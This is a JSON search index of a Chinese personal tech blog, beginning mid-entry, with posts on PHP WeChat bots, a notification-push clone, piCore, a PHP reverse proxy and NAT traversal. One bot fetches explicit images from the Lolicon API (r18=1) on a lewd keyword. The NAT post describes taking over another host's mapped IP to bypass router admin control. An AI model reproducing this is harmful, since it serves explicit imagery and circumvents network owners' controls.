sha1(implode($tmpArr)) == $_GET[\"signature\"] ){if($_GET[\"echostr\"]){echo $_GET[\"echostr\"];}else{ //  加载XML内容$content = file_get_contents(\"php://input\");$p = xml_parser_create();xml_parse_into_struct($p, $content, $vals, $index);xml_parser_free($p);if($vals[$index['MSGTYPE'][0]]['value'] == 'text'){if($vals[$index['CONTENT'][0]]['value'] == '来点色图'){echo '<xml>  <ToUserName><![CDATA['.$vals[$index['FROMUSERNAME'][0]]['value'].']]></ToUserName>  <FromUserName><![CDATA['.$vals[$index['TOUSERNAME'][0]]['value'].']]></FromUserName>  <CreateTime>'.time().'</CreateTime>  <MsgType><![CDATA[text]]></MsgType>  <Content><![CDATA[开始发起请求，请耐心等待]]></Content></xml>';file_get_contents('https://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?upap=1&openid='.$vals[$index['FROMUSERNAME'][0]]['value'], false, stream_context_create(array('http' => array('timeout' => 0.5))));}else{echo 'success';}}}}else{echo 'error';}2021.02.26更新：似乎在库中的图片有一些是被删掉了，所以为了提高回复的成功率，增加了3次重试。如何使用？具体应该不需要我说了吧，看之前的几篇关于微信机器人的文章里面的这段就行了。这里我删掉了2个参数，又增加了2个，一个是Token，想填啥都行，只要和测试号里配置一样就行。另一个是source，那个是Pixiv的图片服务器，如果后端服务器在国外那这个就不用管了，如果在国内的话需要改成https://i.pixiv.cat来做反代，或者如果有其他反代服务也可以，自己用CloudFlare Worker建一个也没有问题。结尾那个Lolicon API实在是不好用，不过我也懒得解决了，所以就托学弟在做Pixiv日榜的收集，回头看看效果怎么样，实在不行就去研究一下各种各样的什么booru之类的图站吧，用那些图片也是个不错的选择。" },{ "title": "如何制作一个能发好图的微信机器人", "category": "", "tags": "微信, 聊天, 机器人, PHP", "url": "/2021/02/19/picbot.html", "date": "2021/02/19", "content": "微信？不好。PHP？好！起因前几天，我由于图片机器人做失败了所以做了一个聊天机器人，但是很可惜，人家图灵机器人支持一键接入微信公众号，哦，当然测试号不行，总而言之做那个什么聊天机器人毫无意义，而且我还用的是V1的API，功能根本就没发挥出来。   总之，既然目标是做图片机器人，那么就不能就聊天机器人而满足了，正好，今天看到群友分享了一个不错的API，文档写的很清晰，而且功能不错，我反正也懒得去思考要怎么搞Pixiv上面的图片，既然有人已经写好了，那就直接用就好了。怎么搞既然图源有了，那么要怎么发送图片呢？既然听别人说可以用什么客服接口，那就再仔细看看那个文档呗。我以前以为那个客服接口必须要生成客服账号啥的很麻烦就没怎么看，后来发现好像不用，而且只要用户发一句话，在48小时内都可以调用这个接口给用户发消息，那这么看来就很棒了啊，我还以为只有5秒内被动回复一种方法，这样我可以直接整个异步过去。具体API的用法可以去看微信开放文档。快点上代码<?php$appid=微信appID;$secret=微信appsecret;$appkey=图灵机器人APIkey;$apikey='Lolicon API Key';ini_set('session.gc_maxlifetime', 7200);ignore_user_abort(true);set_time_limit(0);session_id('Storage');session_start();if(!json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token='.$_SESSION['access_token']),true)['ip_list']){$_SESSION['access_token']=json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid='.$appid.'&secret='.$secret),true)['access_token'];}if($_GET[\"upap\"]){define('MULTIPART_BOUNDARY', '--------------------------'.microtime(true));$picurl=json_decode(file_get_contents('https://api.lolicon.app/setu/?r18=1&size1200=1&apikey='.$apikey),true)['data'][0]['url'];if(!$picurl){$picurl=json_decode(file_get_contents('https://api.lolicon.app/setu/?r18=1&size1200=1'),true)['data'][0]['url'];}if(!$picurl){file_get_contents('https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token='.$_SESSION['access_token'] , false, stream_context_create(array('http' => array('method' => 'POST','header' => 'Content-type: application/json;charset=utf-8','content' => '{    \"touser\":\"'.$_GET[\"openid\"].'\",    \"msgtype\":\"text\",    \"text\":    {         \"content\":\"很抱歉，获取失败，可能是API次数达到上限，请明天再试\"    }}'))));exit();}$context = stream_context_create(array(    'http' => array(          'method' => 'POST',          'header' => 'Content-Type: multipart/form-data; boundary='.MULTIPART_BOUNDARY,          'content' => \"--\".MULTIPART_BOUNDARY.\"\\r\\n\".            \"Content-Disposition: filename=\\\"image.png\\\"\\r\\n\".            \"Content-Type: image/png\\r\\n\\r\\n\".            file_get_contents($picurl).\"\\r\\n\".            \"--\".MULTIPART_BOUNDARY.\"--\\r\\n\"    )));file_get_contents('https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token='.$_SESSION['access_token'] , false, stream_context_create(array('http' => array('method' => 'POST','header' => 'Content-type: application/json;charset=utf-8','content' => '{    \"touser\":\"'.$_GET[\"openid\"].'\",    \"msgtype\":\"image\",    \"image\":    {      \"media_id\":\"'.json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/media/upload?access_token='.$_SESSION['access_token'].'&type=image', false, $context),true)['media_id'].'\"    }}'))));exit();}function checkSignature(){    $signature = $_GET[\"signature\"];    $timestamp = $_GET[\"timestamp\"];    $nonce = $_GET[\"nonce\"];\t    $token = 'mayx';    $tmpArr = array($token, $timestamp, $nonce);    sort($tmpArr, SORT_STRING);    $tmpStr = implode( $tmpArr );    $tmpStr = sha1( $tmpStr );        if( $tmpStr == $signature ){        return true;    }else{        return false;    }}if(checkSignature()){if($_GET[\"echostr\"]){echo $_GET[\"echostr\"];}else{ //  加载XML内容$content = file_get_contents(\"php://input\");$p = xml_parser_create();xml_parse_into_struct($p, $content, $vals, $index);xml_parser_free($p);if($vals[$index['MSGTYPE'][0]]['value'] == 'text'){if($vals[$index['CONTENT'][0]]['value'] == '来点色图'){echo '<xml>  <ToUserName><![CDATA['.$vals[$index['FROMUSERNAME'][0]]['value'].']]></ToUserName>  <FromUserName><![CDATA['.$vals[$index['TOUSERNAME'][0]]['value'].']]></FromUserName>  <CreateTime>'.time().'</CreateTime>  <MsgType><![CDATA[text]]></MsgType>  <Content><![CDATA[开始发起请求，请耐心等待]]></Content></xml>';file_get_contents('https://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?upap=1&openid='.$vals[$index['FROMUSERNAME'][0]]['value'], false, stream_context_create(array('http' => array('timeout' => 0.5))));}else{echo '<xml>  <ToUserName><![CDATA['.$vals[$index['FROMUSERNAME'][0]]['value'].']]></ToUserName>  <FromUserName><![CDATA['.$vals[$index['TOUSERNAME'][0]]['value'].']]></FromUserName>  <CreateTime>'.time().'</CreateTime>  <MsgType><![CDATA[text]]></MsgType>  <Content><![CDATA['.json_decode(file_get_contents('https://www.tuling123.com/openapi/api', false, stream_context_create(array('http' => array('method' => 'POST','header' => 'Content-type:application/x-www-form-urlencoded','content' => http_build_query(array('key' => $appkey,'info' => $vals[$index['CONTENT'][0]]['value'],'userid' => $vals[$index['FROMUSERNAME'][0]]['value'])))))),true)['text'].']]></Content></xml>';}}}}else{echo 'error';}2021.02.19更新：当Lolicon API Key次数不够时会尝试不使用Key调用，增加了缓存access_token的功能。另外以后我会自己搞一个图片API，免得总是被这个每天只有300次调用的垃圾API所限制。   2021.02.21更新：上次不知道怎么就脑残的用了调用次数只有500次的获取用户接口作为检查access_token的依据，这次换了个没有上限的，另外把session的回收时间改成了2个小时，和接口对应。怎么用？和上一篇一样，不过有一个不一样的地方就是这里需要一个Lolicon API Key，如果没有的话好像限制非常高，可能一天只能调用1-2次吧，有API Key好像可以每天请求300次，具体怎么用可以看他们的文档。    API Key的申请方式是去找他们的Telegram机器人@loliconApiBot，倒是还挺简单的，申请出一个API和一个测试号可以供100人使用，这一点还是挺不错的。   最后做好了就可以向测试号发送来点什么图？关键词可以自己在代码里改。   如果不想整图灵机器人也行，那个东西要实名还是挺麻烦的，不过这样聊天功能就不能正常工作了 （谁用这个机器人是和聊天机器人聊天啊！） 。   另外PHP空间很好申请的，相比Python还是非常有性价比的，至少可以不用租服务器。总结这次代码用了不少有意思的特性，比如通过file_get_contents直接上传文件，以及PHP异步之类的，这个异步的功能还是我自己想出来的哦，现在在百度上都不一定能搜到我这样的方法。   总之PHP还是挺有意思的。" },{ "title": "自制一个简单的微信聊天机器人", "category": "", "tags": "微信, 聊天, 机器人, PHP", "url": "/2021/02/06/wechatbot.html", "date": "2021/02/06", "content": "感觉API好像还挺有意思起因前两天我制作了Server酱·TurboMini版之后感觉微信公众号的API好像还挺有意思的，总的来说也不是很复杂，没有用什么特别奇怪的东西，而且文档还算清晰，这一点还是很不错的。   于是最近我就开始看微信开放文档，其实我刚写完Server酱·TurboMini版之后我就在想，好多人在QQ上搞那种只要说来点什么图，机器人就会发图片的一个功能。我感觉这个好像有点意思，因为我平时用微信更多一些，既然有测试号这样好的平台，那么我就应该搞点这样的功能。   我花了一天的时间通读整个文档然后把程序写了出来，然而发生了很糟糕的事情，那就是微信被动回复的时间要求必须在5秒以内，否则就会报错，然而让服务器转发图片本来就很耗时，又加上我用的是垃圾国外免费的虚拟空间，中国与国际互联网的连接又很差劲，导致5秒内程序必定不可能来得及回复。   没办法，我花了一天时间写的东西，我一定要水一篇文章！所以我想了想，干脆写成聊天机器人吧，那个东西也简单，像我博客上的伊斯特瓦尔就用了聊天机器人（有现成的API啥都好搞）。于是我稍微改动了一下代码，把发图机器人改成了聊天机器人。代码<?php$appid=微信appID;$secret=微信appsecret;$appkey=图灵机器人APIkey;function checkSignature(){    $signature = $_GET[\"signature\"];    $timestamp = $_GET[\"timestamp\"];    $nonce = $_GET[\"nonce\"];\t    $token = 'mayx';    $tmpArr = array($token, $timestamp, $nonce);    sort($tmpArr, SORT_STRING);    $tmpStr = implode( $tmpArr );    $tmpStr = sha1( $tmpStr );        if( $tmpStr == $signature ){        return true;    }else{        return false;    }}if(checkSignature()){if($_GET[\"echostr\"]){echo $_GET[\"echostr\"];}else{$content = file_get_contents(\"php://input\");$p = xml_parser_create();xml_parse_into_struct($p, $content, $vals, $index);xml_parser_free($p);if($vals[$index['MSGTYPE'][0]]['value'] == 'text'){echo '<xml>  <ToUserName><![CDATA['.$vals[$index['FROMUSERNAME'][0]]['value'].']]></ToUserName>  <FromUserName><![CDATA['.$vals[$index['TOUSERNAME'][0]]['value'].']]></FromUserName>  <CreateTime>'.time().'</CreateTime>  <MsgType><![CDATA[text]]></MsgType>  <Content><![CDATA['.json_decode(file_get_contents('https://www.tuling123.com/openapi/api', false, stream_context_create(array('http' => array('method' => 'POST','header' => 'Content-type:application/x-www-form-urlencoded','content' => http_build_query(array('key' => $appkey,'info' => $vals[$index['CONTENT'][0]]['value'],'userid' => $vals[$index['FROMUSERNAME'][0]]['value'])))))),true)['text'].']]></Content></xml>';}}}else{echo 'error';}使用方法和上一篇文章一样，同样需要去申请一个测试号，不过有一点不一样，那就是这一次需要配置接口配置信息，URL就填这个程序能在互联网上访问的地址，而Token则是填mayx。为什么呢？因为我在代码里这样写的啊……如果想改可以把对应的变量改成自己喜欢的值，总之保证两边一样就行。   提交之后接口就配置好了，不过还没有结束，为了能使用机器人，还得要去注册图灵机器人，毕竟又不可能自己去写一个聊天机器人，那个需要的资源太多了。现在那个图灵机器人好像必须要实名才能用，那总之混互联网的人遇到这种问题应该也不是问题了吧。   注册好机器人之后就直接把APIKey粘到代码里面，然后整个代码就可以正常运行了，现在你就可以和你的机器人聊天了。暂时废弃的代码define('MULTIPART_BOUNDARY', '--------------------------'.microtime(true));$file_contents = file_get_contents(json_decode(file_get_contents('https://www.pixiv.net/ajax/illust/'.json_decode(file_get_contents('https://api.loli.st/pixiv/'),true)['illust_id'].'/pages'),true)['body'][0]['urls']['regular'], false, stream_context_create(array('http' => array('method' => 'GET','header' => \"referer: https://www.pixiv.net/\"))));$context = stream_context_create(array(    'http' => array(          'method' => 'POST',          'header' => 'Content-Type: multipart/form-data; boundary='.MULTIPART_BOUNDARY,          'content' => \"--\".MULTIPART_BOUNDARY.\"\\r\\n\".            \"Content-Disposition: filename=\\\"image.png\\\"\\r\\n\".            \"Content-Type: image/png\\r\\n\\r\\n\".            $file_contents.\"\\r\\n\".            \"--\".MULTIPART_BOUNDARY.\"--\\r\\n\"    )));echo '<xml>  <ToUserName><![CDATA['.$vals[$index['FROMUSERNAME'][0]]['value'].']]></ToUserName>  <FromUserName><![CDATA['.$vals[$index['TOUSERNAME'][0]]['value'].']]></FromUserName>  <CreateTime>'.time().'</CreateTime>  <MsgType><![CDATA[image]]></MsgType>  <Image>    <MediaId><![CDATA['.json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/media/upload?access_token='.json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid='.$appid.'&secret='.$secret),true)[access_token].'&type=image', false, $context),true)['media_id'].']]></MediaId>  </Image></xml>';其实这段代码不是不能工作，只是它不能符合要求，没办法及时的把图片上传到微信服务器上，也没办法及时回复……也许如果有很好的条件，这段代码就可以运行了吧……   我也试过如果不是Pixiv上面的图片，而是图片在很小而且也很快的服务器上时，这个代码是能运行的。替代的方案我看完文档之后好像也没有主动向用户发送信息的接口，只有被动发送的，那这5秒问题估计是没法解决了吧……不过我看网上说如果用客服接口好像就没有这样的限制，总之我回头试试看吧。   另外我也想了几种方案：  每天定时向微信服务器上传图片，需要时只发送ID，不再在得到请求时再上传。  设置2条命令，一条用于向微信服务器上传，另一条负责取回。不过这样有个问题就是ID不太好传，可能还得缓存一下，其实上面那个一样也得缓存。  搞成图文形式，每天定时发送，就像日报一样目前大概就想出这么多，更多的睡起来再慢慢想吧~" },{ "title": "自己动手做一个Server酱·TurboMini版", "category": "", "tags": "Server, PHP", "url": "/2021/02/02/serverchan.html", "date": "2021/02/02", "content": "一句话就能解决的问题也敢收费？起因我以前经常使用Server酱给我推送日报，或者告诉我树莓派有没有正常启动之类的事情。之所以使用它是因为那个API还是挺方便的，而且我平时微信也用的多，能直接通过微信推送信息也挺不错的。   后来Server酱整了个什么Turbo版，不过我用普通版用的挺好就没怎么管。结果今天发了个什么通知，说他们的服务有可能要挂？我这个人最讨厌的就是服务不稳定，连个服务都整不稳定的人干脆别做服务了，做出来那不是害人嘛，像之前那个什么LeanCloud就不行，因此我还自己写了一个博客计数器。   然后我就看了看他们的Server酱·Turbo版，好家伙，还是收费的，8CNY/mo有点过分啊，也不过是调用微信接口还要花钱？看了之后我说不行，这个太贵了，我倒要看看这东西到底要花多少资源。   之前我就看他们吹，说自己月请求数5kw，我说这有啥，我花火学园每个月请求数要上亿，也花不了几个钱，5kw就敢出来吹？还敢开课？所以今天我就来看看这所谓的“配置略显复杂”到底有多复杂。试着做一下我看了下微信关于测试号的接口文档，看起来也没多复杂嘛，我估摸了一下，最多一句话就能搞定！然后就试着用PHP写了一下。   最终的代码如下：<?php$appid='appID';$secret='appsecret';$userid='微信号（OpenID）';$template_id='模板ID';$title='标题';$content='内容';file_get_contents('https://api.weixin.qq.com/cgi-bin/message/template/send?access_token='.json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid='.$appid.'&secret='.$secret),true)['access_token'], false, stream_context_create(array('http' => array('method'=>'POST','header'=>\"Content-Type: application/json;charset=utf-8\",'content'=>'{\"touser\":\"'.$userid.'\",\"template_id\":\"'.$template_id.'\",\"data\":{\"title\": {\"value\":\"'.$title.'\"},\"content\": {\"value\":\"'.$content.'\"}}}'))));写好之后测试了一下，效果还不错，和Server酱测试号的效果几乎一模一样，除了没有能点开的网页，当然要想搞也行，很简单，就插一个URL就可以了，如果你希望整些更多的特效，也可以去模板接口文档里面看。    关于限制方面的话也要比Server酱要好，理论上我的代码每天能发送2000次，主要是因为获取access_token的接口每天只能使用2000次，不过如果能缓存access_token的话理论上每天能发送100000次，要比垃圾Server酱的1000次好得多。如何得到参数？我写的代码是兼容Server酱的，所以跟着他们的配置指南也可以直接用，不过有人可能连Server酱是啥都不知道，我也不给他们引流了，免得浪费他们珍贵的服务器资源。   要做的事情很简单，首先打开申请页面，然后扫码登录，成功之后就能看到测试号管理的页面了。   首先看到的是appID和appsecret，这样我们就已经获得了两个参数。另外两个的话就继续往下翻，找到测试号二维码，用微信扫描关注后就会出现自己的微信号，当然这个不是真正的微信号，相当于只是一个识别码，这样第三个参数也得到了。接下来是第四个参数，找到模板消息接口，点击新增测试模板，标题输入推送通知，或者你喜欢的啥都行，内容的话填：{{title.DATA}}{{content.DATA}}之所以这样填是为了兼容Server酱，当然也可以自己改代码然后填别的也行。不过如果不想改代码在末尾加个签名也没有问题，比如说这样：{{title.DATA}}{{content.DATA}}--By Mayx这样第四个参数模板ID我们也得到了，这样上面的代码应该可以正常使用了。   需要注意的一点是由于莫名其妙的原因，有可能扫码后第一次得到的appsecret是错的，如果代码不能正常工作，可以刷新测试号管理的页面看看有没有变化，如果有就输入最新的appsecret。结语我觉得作为开发者，这种简单的小活就自己干吧，没必要给所谓不赞助就不能用功能的开发者给钱，我觉得既然叫赞助，就不能有差别待遇，不然这就叫做收费，就是商业行为，不要用赞助这种词给自己的资本家行为贴金。" },{ "title": "piCore的使用经历", "category": "", "tags": "树莓派, piCore", "url": "/2021/01/17/picore.html", "date": "2021/01/17", "content": "不流行的发行版也很好用啊开端上个月我试着在树莓派上使用piCore，本来是想解决打印机的问题，不过因为没有打印机驱动所以也就无所谓了，还是用电脑好一些。   学校也有一个树莓派，但是没有SD卡，不过没关系，piCore就是在这个时候起作用的，我在学校的时候找了一张我自己的SD卡插在了那个树莓派上，使用piCore启动后就可以把SD卡拔掉了。正因为它的系统在内存中运行，所以没有SD卡也能正常工作。   之后我在上面开了一个穿透，这样我在家也可以玩在学校的树莓派了。使用经历无卡安装软件的经历虽然piCore的系统运行在内存中，但是默认情况下它的软件全部安装在SD卡中，把SD卡拔掉后发生的第一个问题就是软件没有办法正常使用了。原来安装的软件不能启动，然后想安装新的软件也没办法安装……这样就不太好了，像连接Wifi的软件也在SD卡中，虽然有些守护进程运行后程序会载入内存不会因为没有SD卡出问题，但是如果我想连接新的Wifi就没办法使用了……这要我怎么办呢？后来我研究了一下piCore安装软件的代码，那些软件管理器全部都是用的Shell写的，对于从小就在使用Shell的我基本上都能看懂。后来我发现安装的软件其实都不是读取SD卡挂载的目录，而是/etc/sysconfig/tcedir目录，然后这个目录又有一个软链接指向SD卡的挂载目录。这样就很好搞了啊，把原来的软链接删掉，新建一个tcedir的目录就好了。当然不止如此，在这个文件夹里还要创建一个optional目录，这样软件包才能下载到正确的位置。   这些操作完成后就好了吗？并没有，现在安装新的软件已经没有问题了，但是安装以前安装过的软件会出现问题。在piCore中，安装过的软件会在/usr/local/tce.installed这个文件夹下创建一个文件，软件管理器会读取这个文件夹下的内容判断程序是否安装。但是SD卡拔掉后这个文件不会消失，所以我还得要手动把这里面的文件删掉，这样安装旧软件就不会出现问题了。   对了，还有一点是权限问题，由于不知道什么原因，软件管理器要求不能在root权限下安装软件，这样的话在创建/etc/sysconfig/tcedir/optional这个路径的时候就需要注意不能以root权限创建，不然软件有可能会安装失败。   虽然说piCore，或者说TinyCore并不是一个流行的发行版，不过软件还是有不少的。虽然不像Ubuntu那样可以用apt那样有非常多的软件可以用，不过正常使用的话软件基本上也够用了，虽然说也可以安装图形界面，不过因为我用的树莓派3B的内存太小了，只有1G，所以也不敢安，而且我有Windows的远程桌面，也没必要折腾树莓派搞图形界面。运行其他软件的经历作为Linux发行版，软件和生态固然很重要，但是使用软件的方式也不只是用通过安装软件包的方式。软件的本质还是二进制文件，所以说有些piCore仓库里没有的软件，我们也可以直接运行二进制文件。   举一个例子的话……比如说Cloudreve，一个用Golang写的网盘系统，就能很简单的在上面运行。在Release中找到arm64的程序，下载到树莓派上，然后直接解压运行就OK了，非常的轻松，像那些已经编译好的软件很轻松就能拿来直接用。   再比如说就是穿透，我用的是SakuraFrp，同样那是一个单独的已经编译好的程序，直接下载arm64的程序，然后再运行就可以了。   还有比如想通过当CDN赚钱，比如说甜糖，同样下载对应的编译好的程序就OK了，当然即使这个软件能运行，这个计划还要求有32GiB以上的存储空间那还得另外插个U盘啥的那就是那么一回事了……总结由于piCore可以在内存中运行的特性，而且还有不错的软件管理器，我觉得它确实是一个在树莓派上相当不错的系统，而且相对来说也很简单，也许用buildroot也可以整一个类似的系统，但是有piCore就方便很多，也不用编译啥的，安装软件也很方便，另外更新一样也很方便，用tce-update就能更新，卸载的话后来我发现是用tce-audit remove……总的来说系统确实很不错，就是文档真的很垃圾，写的很不清楚，好多功能还得自己研究，然后网上也没有可以参考的……除此之外，设计的确实很不错。" },{ "title": "如何用PHP制作一个简单的反向代理", "category": "", "tags": "PHP, 代理", "url": "/2021/01/06/proxy.html", "date": "2021/01/06", "content": "解决问题还是很简单的。起因由于莫名其妙的原因，很多运营商都屏蔽了Github Pages，导致我上我的博客很困难。这令我很不高兴，但是没办法，毕竟在中国就是这样，搭个网站很麻烦。   在两年前，我的博客也被屏蔽过一次，那时候我是用的Nginx反代解决这个问题的，不过Nginx反代要服务器，当时我用的是花火学园的服务器来搞，但是现在因为登一次花火学园的服务器很麻烦，网络卡的不得了，所以没办法，我只好想想别的更简单的方法解决这个问题。   这时候我就想到了PHP，用PHP解决这个问题应该很简单，用file_get_contents()应该很轻松就可以解决这个问题。解决过程理论上来说，只要整一个php然后里面直接用echo file_get_contents(url)就可以实现反代了，所以首先就按这个思路做，为了让访问的所有请求都发送到这个php里，我得用重写的方式。   我用的是GearHost的虚拟主机，他们的主机都用的是IIS，这导致我还得了解一下IIS的重写怎么搞，还好我的方案和WordPress的重写方案很像，我就直接按照WordPress的方式写了。   把下面的代码放到Rewrite的rules段里就可以正常工作了：<rule name=\"Mayx\" stopProcessing=\"true\"><match url=\"^(.*)$\" /><conditions><add input=\"{REQUEST_FILENAME}\" matchType=\"IsFile\" negate=\"true\" /><add input=\"{REQUEST_FILENAME}\" matchType=\"IsDirectory\" negate=\"true\" /></conditions><action type=\"Rewrite\" url=\"index.php\"/></rule>然后就是新建一个index.php文件，路径的话用$_SERVER['REQUEST_URI']就可以了。   不过如果直接用echo file_get_contents(url)的方法搞会出现一些问题，比如css和js的MIME类型要求必须和实际一样，但是我这个方案会导致所有请求都是text/html类型的，这是个很麻烦的问题啊……   后来我花了2个小时查资料，搜php怎么读MIME，结果搜到的全是mime_content_type()之类乱七八糟的东西，让人很难受。我仔细思考了一下，MIME是在Header里声明的，我应该去搜Header，而不是怎么读MIME，最终可算是搜到了一点有用的东西了，也就是$http_response_header，这个东西好像是个数组，后来我想了一下干脆不要考虑怎么读MIME，直接把Header跟着重写一遍算了，于是最终代码如下：<?php$content=file_get_contents(\"https://mabbs.github.io\".$_SERVER['REQUEST_URI']);foreach($http_response_header as $header){header($header);}if($content){echo $content;}else{echo \"404\";}之后的操作这么搞完之后基本上就可以正常工作了，于是我的博客域名再一次更换（专供中国用户）：yuki.gear.host，另外把备用的Gitalk的Github Apps返回地址也改了，基本上就可以正常工作了。希望以后GFW能做个人，不要再乱搞国内的网络环境了。" },{ "title": "年终总结", "category": "", "tags": "总结", "url": "/2021/01/04/summary.html", "date": "2021/01/04", "content": "又一年过去了啊……Null2020年过完了啊……明明和2019年一样也不过在学校待了半个学期，而且理论上来说今年我应该会过的更好啊……为什么我会■■到什么也不记得呢？   又回看了一遍去年的年终总结，今年我真的是啥都没干啊……   本来这一篇年终总结应该放到5天前的，可是无论如何我似乎都没心情写下去了……有一部分是因为中国的互联网环境越来越糟糕，想在中国不备案的情况下建网站越来越难了，现在很多地方的运营商都已经开始屏蔽Github Pages，以至于我自己连我的博客都要用特别的方法上……   另外就是什么都不记得的问题，近几天我的生存环境是真的很糟糕啊……并不是说待的环境很糟糕，应该是说生存能力变差了很多吧。不仅如此，我感觉各项能力水平都开始下降了……   其实不应该这样糟糕的，至少前两天我还抽奖中了一个机械键盘，应该感到高兴。不过中奖也不过如此，我在玩PCR的时候1＃什么都没出也是很糟糕的事情啊……更何况300连后又抽了11发，仍然什么都没有，随机的事情也不过如此。2020年特别的事情是时候想点高兴的事情了，像在这个学期我成为了我所在社团部门的部长，这本身倒也没啥，不过在这个职位所得到的东西是应该让我很高兴才对。   像是在冬天温暖的办公室，很多性能虽然很差但是就是免费而且能用的电脑，可以躺下来像家庭影院般的投影仪，以及试用了1个月的理论上可以创造1wCNY价值的服务器，这些都是很不错的事情，而且它们都是免费的（相比于其他人所享用的事情）。然而即使如此还是会出现问题，莫名其妙的问题……  其他的事情似乎能回想起来的不多了，直接看以前写的文章也许可以大概的了解一些。另外根据统计来看，我似乎在家里写的博客更多？果然我虽然好像享有很多东西，可是没有家里舒服，虽然我在家里也并不开心，但是似乎还是比在学校好一点……这真的是很令人担心啊……更早的事情似乎根据我的记录来看，只要是和人在一起，终究我都不会很高兴，另外现在我在写这一篇文章的状态也不太好，虽然打字看起来甚至熟练到就和说话一样，但是思维却是乱的。   即使在完全没有人的地方，我肯定也没有合适的生存环境，令人沮丧的一点是所有的事情全部都是有期限的，就像隔一段时间要洗澡，衣服也只能穿一段时间……我很久以前就在想，如果可以像服务器一样整天都在最舒适的环境下，除了连接网络其他什么都不需要，不需要什么像屏幕、键盘、鼠标等等的IO设备，仅仅需要连接网络该多好，这就让我想起来前段时间玩的《Cyberpunk 2077》了，转换成为印迹永远的生活在网络空间中……   当然我没有像服务器那样的工作能力，资本家永远是资本家，不是所有的主机都可以享用那样的环境，因为不是所有主机都有那样的能力，我即使能够24小时在网络世界中，我也没有钱在我没办法创造利益的情况下生活一辈子，所以想着那样的事情也没有用，看看接下来该怎么继续向前走吧！后记其实我在12月31的时候本来是想写对内网穿透的进一步研究，不过好像精神状态不太能支持我写下去，所以接下来我会再仔细研究一下NAT和NAPT，然后写出新的文章。   其他我也没什么特别想说的了，今天就先这样吧！接下来几天还要考试，虽然现在我什么都不会，接下来的考试我感觉很难通过，但是没办法，也只能这样了，不知道接下来的生活会怎么样……" },{ "title": "关于内网穿透的笔记", "category": "", "tags": "内网穿透", "url": "/2020/12/13/nat.html", "date": "2020/12/13", "content": "为了更好的运用资源，内网穿透是必要的。起因最近我的学校给我分配了一些服务器资源，大概在市场上价格基本上在1wCNY/mo的样子。这些资源非常好，但是有一个问题，那就是没有外网IP，想要运用这些资源必须要到机房。像机房那样的地方又冷又吵，不过我不在意，可惜问题不在这里，问题在于它只能在机房用，我又不能常常待在机房，那我到底应该怎么办呢？   其实解决方案很简单，那就是搞内网穿透。现在内网穿透的技术已经很多了，不过总体来说主要还是一个东西，那就是隧道。内网穿透的原理我大概查了一下相关的资料，一般来说内网是路由器自己划分出来的局域网。正常来说，如果想让所有的机器都登上外网，可以把路由器换成交换机，可惜换不得，毕竟外网IPv4的资源是有限的，就是插了交换机，也需要ISP分配IP地址给机器。   根据我的了解，局域网和广域网进行通信的时候会用到一个叫做NAT的技术，大概原理就是路由器在内网访问外网时能把自己伪装成一般的电脑向其他服务器发送数据，发送过去的时候路由器会记住是哪个内网设备发送的数据，最终传回的数据路由器也会按原路转发回请求的主机，通过这样就可以把内网和外网联系起来。   这时候就会有一个问题，那就是在这个过程中路由器和其他的电脑没有什么区别，假如在广域网的机器想要访问局域网的机器，那么正常来说就是直接访问那个路由器所在的IP就可以了，但是内网并没有发请求给广域网，路由器也不知道要把数据传给谁，它就会把这个数据丢掉。   这个问题应该怎么解决？其实很简单，那就是连之前先由局域网的机器向想要访问这个机器的外网机器发送数据，这样外网机器就能顺理成章的连到内网的机器里面了，这确实是一个不错的解决方案，事实上现在几乎所有的内网穿透都是使用的这个方案。   除此之外还有一个叫做UPnP的协议貌似也可以穿透，P2P应该都是用的这种方法，不过需要路由器支持才行。这种协议好像可以自动进行端口映射，大概是通过某种协议让路由器可以在内网机器没有主动发送数据的情况下把数据发送给内网机器吧，具体我也不是很清楚。    另外如果有内网与外网相连的路由器的管理权限，也同样可以做到内网穿透，直接搞端口映射就完事，这种就更加简单了，但是一般情况下我们肯定没有路由器的管理权，不然也不至于这么苦恼了。一些实现的方案现在内网穿透的技术有很多，不过因为内网机器直接主动连外网这种方法比较简单，所以接下来说到的方法基本上都是通过这种方式的。利用VPN创建隧道VPN的原理是通过由主机主动向VPN服务器连接隧道并通过虚拟一个路由器组成VLAN的一种技术，通过这个介绍也能很明显看出来这是由主机主动发出的吧，通过这种方式即使不在内网中也可以让内网的电脑连自己的VPN来连接内网的电脑，以此再继续连到内网电脑所能连接的网络里面。   这种方法算是比较简单，而且很安全的方式，不过可惜中国的好多ISP都屏蔽VPN，用这种方式不是很稳当。SSH隧道SSH这个软件很强大，有的功能也很多。既然VPN被屏蔽了那22端口总不至于屏蔽吧，总不能把运维的饭都给抢了吧？通过SSH隧道的方式使用起来也很简单，在公网服务器上打开sshd的GatewayPorts功能，内网设备通过执行类似于ssh -fN -R 10022:localhost:22 远程用户@远程主机这样的命令启动隧道，然后其他电脑就可以通过这个公网服务器连这个内网设备了。   这种方法很不错，但是还是有一个问题，那就是需要租服务器（刚才的VPN同样需要），所以可以还有更好的方案。某些服务商提供的frpfrp从名字上就能听出来它是一种代理吧，这种东西目前有很多服务商都有提供，比如SakuraFrp，还有花生壳啥的，当然如果手头有服务器也可以自己搭。这种的和前面几种不一样的是它反代出来的服务可以让其他用户直接用，很方便，不过有一个限制，就是一台服务器最多只能反代出64551个服务（不考虑tcp和udp的区别），正常人都是够用了。端口映射这是最好的方案，毕竟这样做可以保证不限速，而且也不需要外网服务器，但是路由器的管理权限很难搞，这确实没办法。后记所以最后我用了哪种方案呢？既然端口映射最好那当然是用这个啦！但是有一个问题是我没有路由器管理权，怎么办呢？没关系，这个路由器以前有人做过端口映射，只是现在没人用了而已，于是我就跟着这个配置把服务器设置成和被映射主机一样的IP，然后就可以用了。   